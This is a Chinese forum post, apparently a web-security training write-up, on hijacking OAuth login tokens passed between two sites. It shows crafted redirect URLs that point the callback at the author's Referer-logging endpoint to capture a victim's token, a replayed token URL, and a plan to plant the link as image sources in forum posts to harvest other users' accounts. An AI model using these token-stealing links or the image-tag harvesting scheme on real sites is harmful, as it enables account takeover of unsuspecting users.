找回密码
快捷导航

首先我们来看看这个案例,我感觉是比较简单易懂的。分为A站与 B站

某网站有一个在线课堂的功能点


1.jpg


在这里呢当我们点击之后跳转到以下链接

[HTML] 纯文本查看 复制代码
[/p][p=30, 2, left]http://www.打码.com/auth/Oauth/default.shtml?action=redirect&customerId=8acc0d81-c2a7-4912-a64e-a2c4cdc31966&callBackUrl=http://打码/api/pm/eduyunInter.json[/p][p=30, 2, left]


其中customerid的参数应该是 customer member Id(客户会员ID)的缩写。

那么其中后面的参数值代表的就是我们在A站的账户ID。

上面的链接被访问完毕后会生成一个token值

2.jpg

可以看到这个数据包过后会跳转至:http://123.123.123.123/api/pm/ed ... 63440ad4948fc44dd06

其中的token参数值为 我们上一个链接生成的令牌,该令牌可以证明我们是XXX,也就是出国后所办理的护照含义,当

123.123.123.123这个站(B站)接收到了我们的token参数值会先效验是否合法,也就是是否是伪造的证件。


4.jpg


如果token值无效,那么就不会登陆成功账户。反之则登陆成功。


如何劫持这个token?

说道这里各位应该都了解,如果我们可以获取到用户的token那么就能直接登陆该账户,从而控制,那么怎么去截获呢?

https://www.chinacycc.com/auth/Oauth/default.shtml?action=redirect&customerId=会员ID&callBackUrl=http://123.123.123.123/api/pm/eduyunInter.json

我们可以看到在链接的尾部callBackUrl参数值会是http://123.123.123.123/api/pm/eduyunInter.json 那如果替换为我们的Referer平台链接呢?

5.jpg


6.jpg


https://www.chinacycc.com/auth/Oauth/default.shtml?action=redirect&customerId=会员ID&callBackUrl=http://re.chinacycc.com/referer.php?c=打码


拿去访问,然后查看平台发现


7.jpg


成功截获Token值。接着将其替换到

http://123.123.123.123/api/pm/eduyunInter.json?token=391fe7011e5cd1b56c8b7474470f434b

访问一下:

8.jpg


只需要别人访问了下面链接,我就能在Referer收到他的token值。

https://www.chinacycc.com/auth/Oauth/default.shtml?action=redirect&customerId=会员ID&callBackUrl=http://re.chinacycc.com/referer.php?c=打码

结合以上思路进行拓展攻击,该网站存在大量发帖功能点,日志,照片,论坛等地方,如果将其上面链接缩短,在发表日志,帖子过程中将帖子图片地址替换成我们的攻击payload那么利用浏览器自动加载img标签的特性就能源源不断的获取论坛其他用户的账户权限。其实QQ,微信,等第三方登陆原理相同。


只需要思考一个问题?A站的账户登陆B站,B站是如何判断A站的账户登陆成功了的?



诚殷网络专注WEB安全培训!
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Powered by Discuz! X3.4  © 2001-2013 Comsenz Inc.